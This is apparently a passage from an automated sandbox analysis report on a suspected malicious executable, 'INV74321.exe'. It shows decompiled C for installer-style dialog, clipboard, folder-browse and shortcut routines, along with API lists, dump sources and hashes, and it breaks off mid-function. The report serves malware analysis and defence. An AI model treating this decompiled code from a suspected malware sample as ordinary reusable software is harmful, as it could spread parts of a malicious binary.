                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                          • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                          • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                          • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 0040535C, Relevance: 54.3, APIs: 36, Instructions: 282windowclipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 96%
                                                          			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x42ec04; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x42a890;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x42ebec - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42f428, 8);
							__eflags =  *0x42f4cc - _t150;
							if( *0x42f4cc == _t150) {
								E0040521E( *((intOrPtr*)( *0x42a068 + 0x34)), _t150);
							}
							E00404154(1);
							goto L25;
						}
						 *0x429c60 = 2;
						E00404154(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E004041E2(_t157, _a12, _a16);
						}
						ShowWindow( *0x42ebf0, _t150);
						ShowWindow(_v8, 8);
						E004041B0(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x42f434;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x42ec04 = _t128;
				_v8 = _t128;
				E004041B0( *0x42ebf0);
				 *0x42ebf4 = E00404AA1(4);
				 *0x42ec0c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E0040417B(_a4);
				if(( *0x42f43c & 0x00000003) != 0) {
					ShowWindow( *0x42ebf0, _t150);
					if(( *0x42f43c & 0x00000002) != 0) {
						 *0x42ebf0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004041B0( *0x42ebe8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42f43c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}



































                                                          0x00405362
                                                          0x0040536a
                                                          0x0040536d
                                                          0x00405375
                                                          0x00405378
                                                          0x00405507
                                                          0x0040550d
                                                          0x00405531
                                                          0x00405531
                                                          0x0040553d
                                                          0x00405543
                                                          0x00405565
                                                          0x00405565
                                                          0x0040556b
                                                          0x004055c0
                                                          0x004055c0
                                                          0x004055c3
                                                          0x00000000
                                                          0x00000000
                                                          0x004055c5
                                                          0x004055c8
                                                          0x004055cb
                                                          0x00000000
                                                          0x00000000
                                                          0x004055d5
                                                          0x004055db
                                                          0x004055dd
                                                          0x004055e0
                                                          0x004056dd
                                                          0x00000000
                                                          0x004056dd
                                                          0x004055ef
                                                          0x004055fb
                                                          0x00405604
                                                          0x0040560b
                                                          0x0040560f
                                                          0x00405612
                                                          0x0040561b
                                                          0x00405621
                                                          0x00405624
                                                          0x00405624
                                                          0x00405634
                                                          0x0040563a
                                                          0x0040563d
                                                          0x00405648
                                                          0x00405648
                                                          0x00405649
                                                          0x0040564c
                                                          0x00405653
                                                          0x0040565a
                                                          0x00405662
                                                          0x00405662
                                                          0x00405670
                                                          0x00405676
                                                          0x00405679
                                                          0x00405679
                                                          0x00405680
                                                          0x00405686
                                                          0x0040568f
                                                          0x00405696
                                                          0x0040569f
                                                          0x004056a1
                                                          0x004056a4
                                                          0x004056b3
                                                          0x004056b5
                                                          0x004056b8
                                                          0x004056b9
                                                          0x004056bc
                                                          0x004056bd
                                                          0x004056be
                                                          0x004056be
                                                          0x004056c6
                                                          0x004056d1
                                                          0x004056d7
                                                          0x004056d7
                                                          0x00000000
                                                          0x0040563d
                                                          0x0040556d
                                                          0x00405573
                                                          0x004055a1
                                                          0x004055a3
                                                          0x004055a9
                                                          0x004055b4
                                                          0x004055b4
                                                          0x004055bb
                                                          0x00000000
                                                          0x004055bb
                                                          0x00405577
                                                          0x00405581
                                                          0x00000000
                                                          0x00405545
                                                          0x00405545
                                                          0x0040554b
                                                          0x00405586
                                                          0x00000000
                                                          0x0040558d
                                                          0x00405554
                                                          0x0040555b
                                                          0x00405560
                                                          0x00000000
                                                          0x00405560
                                                          0x00405543
                                                          0x0040537e
                                                          0x00405382
                                                          0x0040538a
                                                          0x0040538e
                                                          0x00405391
                                                          0x00405394
                                                          0x00405397
                                                          0x0040539a
                                                          0x0040539b
                                                          0x0040539c
                                                          0x004053b5
                                                          0x004053b8
                                                          0x004053c2
                                                          0x004053d1
                                                          0x004053d9
                                                          0x004053e1
                                                          0x004053e6
                                                          0x004053e9
                                                          0x004053f5
                                                          0x004053fe
                                                          0x00405407
                                                          0x00405429
                                                          0x0040542f
                                                          0x00405440
                                                          0x00405445
                                                          0x00405453
                                                          0x00405461
                                                          0x00405461
                                                          0x00405466
                                                          0x00405474
                                                          0x00405474
                                                          0x00405479
                                                          0x0040547c
                                                          0x00405481
                                                          0x0040548d
                                                          0x00405496
                                                          0x004054a3
                                                          0x004054b2
                                                          0x004054a5
                                                          0x004054aa
                                                          0x004054aa
                                                          0x004054be
                                                          0x004054be
                                                          0x004054d2
                                                          0x004054db
                                                          0x004054e4
                                                          0x004054f4
                                                          0x00405500
                                                          0x00405500
                                                          0x00000000

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 004053BB
                                                          • GetDlgItem.USER32 ref: 004053CA
                                                          • GetClientRect.USER32 ref: 00405407
                                                          • GetSystemMetrics.USER32 ref: 0040540E
                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                          • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                          • GetDlgItem.USER32 ref: 004054CB
                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                          • GetDlgItem.USER32 ref: 004053D9
                                                            • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,00000001,00403FE0), ref: 004041BE
                                                          • GetDlgItem.USER32 ref: 0040551C
                                                          • CreateThread.KERNEL32 ref: 0040552A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                          • ShowWindow.USER32(00000000), ref: 00405554
                                                          • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                          • ShowWindow.USER32(00000008), ref: 004055A1
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                          • CreatePopupMenu.USER32 ref: 004055E6
                                                          • AppendMenuA.USER32 ref: 004055FB
                                                          • GetWindowRect.USER32 ref: 0040561B
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                          • OpenClipboard.USER32(00000000), ref: 00405680
                                                          • EmptyClipboard.USER32 ref: 00405686
                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                          • GlobalLock.KERNEL32 ref: 00405699
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                          • SetClipboardData.USER32 ref: 004056D1
                                                          • CloseClipboard.USER32 ref: 004056D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID:
                                                          • API String ID: 590372296-0
                                                          • Opcode ID: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                          • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                          • Opcode Fuzzy Hash: 97abd2f5be5f2dae788b800ab975af2d24296fb55a7b09bb9be2c01580a4233f
                                                          • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040460D, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 274stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 78%
                                                          			E0040460D(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42a068;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E004057F7(0x3fb, _t146);
					E004063D2(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004057F7(0x3fb, _t146);
							if(E00405B7D(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E004060F7(0x429860, _t146);
							_t87 = E00406500(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E004060F7(0x429860, _t146);
								_t89 = E00405B28(0x429860);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429860) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429860,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405AD6(0x429860);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429860) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404AA1(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x42ebfc; // 0x569dca
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404A89(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429850);
									} else {
										E004049C4(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42f4e4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E0040419D(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a880 == _t158) {
									E00404566();
								}
								 *0x42a880 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a890;
							_v60 = E0040495E;
							_v56 = _t146;
							_v68 = E0040618A(_t146, 0x42a890, _t166, 0x429c68, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405A8F(_t146);
								_t125 =  *((intOrPtr*)( *0x42f434 + 0x11c));
								if( *((intOrPtr*)( *0x42f434 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E0040618A(_t146, 0x42a890, _t166, 0, _t125);
									if(lstrcmpiA(0x42e3c0, 0x42a890) != 0) {
										lstrcatA(_t146, 0x42e3c0);
									}
								}
								 *0x42a880 =  *0x42a880 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405AFC(_t146) != 0 && E00405B28(_t146) == 0) {
						E00405A8F(_t146);
					}
					 *0x42ebf8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E0040417B(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E0040417B(_t166);
					E004041B0(_t165);
					_t138 = E00406500(8);
					if(_t138 == 0) {
						L53:
						return E004041E2(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}














































                                                          0x0040460d
                                                          0x00404613
                                                          0x00404619
                                                          0x00404626
                                                          0x00404634
                                                          0x00404637
                                                          0x0040463f
                                                          0x00404645
                                                          0x00404645
                                                          0x00404651
                                                          0x00404654
                                                          0x004046c2
                                                          0x004046c9
                                                          0x004047a0
                                                          0x004047a7
                                                          0x004047b6
                                                          0x004047b6
                                                          0x004047ba
                                                          0x004047c4
                                                          0x004047d1
                                                          0x004047d3
                                                          0x004047d3
                                                          0x004047e1
                                                          0x004047e8
                                                          0x004047ef
                                                          0x004047f2
                                                          0x00404829
                                                          0x0040482b
                                                          0x00404831
                                                          0x00404836
                                                          0x0040483a
                                                          0x0040483c
                                                          0x0040483c
                                                          0x00404858
                                                          0x00000000
                                                          0x0040485a
                                                          0x0040485d
                                                          0x0040486b
                                                          0x00404871
                                                          0x00404872
                                                          0x00404875
                                                          0x00404878
                                                          0x00000000
                                                          0x00404878
                                                          0x004047f4
                                                          0x004047f6
                                                          0x004047fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004047fc
                                                          0x004047fc
                                                          0x00404809
                                                          0x0040480e
                                                          0x00000000
                                                          0x00000000
                                                          0x00404812
                                                          0x00404814
                                                          0x00404814
                                                          0x0040481c
                                                          0x0040481e
                                                          0x00404821
                                                          0x00404824
                                                          0x00404827
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404827
                                                          0x00404884
                                                          0x0040488e
                                                          0x00404891
                                                          0x00404894
                                                          0x0040489b
                                                          0x0040489b
                                                          0x0040489d
                                                          0x0040489d
                                                          0x004048a2
                                                          0x004048a4
                                                          0x004048ac
                                                          0x004048b3
                                                          0x004048b5
                                                          0x004048c0
                                                          0x004048c0
                                                          0x004048b5
                                                          0x004048c7
                                                          0x004048d0
                                                          0x004048da
                                                          0x004048e2
                                                          0x004048fd
                                                          0x004048e4
                                                          0x004048ed
                                                          0x004048ed
                                                          0x004048e2
                                                          0x00404902
                                                          0x00404907
                                                          0x0040490c
                                                          0x00404915
                                                          0x00404915
                                                          0x0040491e
                                                          0x00404920
                                                          0x00404920
                                                          0x0040492c
                                                          0x00404934
                                                          0x0040493e
                                                          0x0040493e
                                                          0x00404943
                                                          0x00000000
                                                          0x00404943
                                                          0x004047f2
                                                          0x004047a9
                                                          0x004047b0
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004047b0
                                                          0x004046cf
                                                          0x004046d8
                                                          0x004046f2
                                                          0x004046f7
                                                          0x00404701
                                                          0x00404708
                                                          0x00404714
                                                          0x00404717
                                                          0x0040471a
                                                          0x00404721
                                                          0x00404729
                                                          0x0040472c
                                                          0x00404730
                                                          0x00404737
                                                          0x0040473f
                                                          0x00404799
                                                          0x00404741
                                                          0x00404742
                                                          0x00404749
                                                          0x00404753
                                                          0x0040475b
                                                          0x00404768
                                                          0x0040477c
                                                          0x00404780
                                                          0x00404780
                                                          0x0040477c
                                                          0x00404785
                                                          0x00404792
                                                          0x00404792
                                                          0x0040473f
                                                          0x00000000
                                                          0x004046f7
                                                          0x004046e5
                                                          0x00000000
                                                          0x00000000
                                                          0x004046eb
                                                          0x00000000
                                                          0x00404656
                                                          0x00404663
                                                          0x0040466c
                                                          0x00404679
                                                          0x00404679
                                                          0x00404680
                                                          0x00404686
                                                          0x0040468f
                                                          0x00404692
                                                          0x00404695
                                                          0x0040469d
                                                          0x004046a0
                                                          0x004046a3
                                                          0x004046a9
                                                          0x004046b0
                                                          0x004046b7
                                                          0x00404949
                                                          0x0040495b
                                                          0x004046bd
                                                          0x004046c0
                                                          0x00000000
                                                          0x004046c0
                                                          0x004046b7

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 0040465C
                                                          • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                          • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                          • lstrcmpiA.KERNEL32(GHFGHFGHFDGDFGDFg,0042A890,00000000,?,?), ref: 00404774
                                                          • lstrcatA.KERNEL32(?,GHFGHFGHFDGDFGDFg), ref: 00404780
                                                          • SetDlgItemTextA.USER32 ref: 00404792
                                                            • Part of subcall function 004057F7: GetDlgItemTextA.USER32 ref: 0040580A
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\INV74321.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                            • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\INV74321.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                            • Part of subcall function 004063D2: CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                          • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 00404850
                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                            • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                            • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                            • Part of subcall function 004049C4: SetDlgItemTextA.USER32 ref: 00404A7D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.220754065.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.220747343.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220765903.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220771442.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220783231.0000000000415000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220812028.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220825040.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000000.00000002.220833630.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: A$C:\Users\user\AppData\Local\Temp$GHFGHFGHFDGDFGDFg
                                                          • API String ID: 2624150263-432094902
                                                          • Opcode ID: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                          • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                          • Opcode Fuzzy Hash: e2093240277334122aeb027a85fba7e6720a3e9e52d6b68153c58a68e5512187
                                                          • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E0040216B() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405AFC( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408524, _t87, 1, 0x408514, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
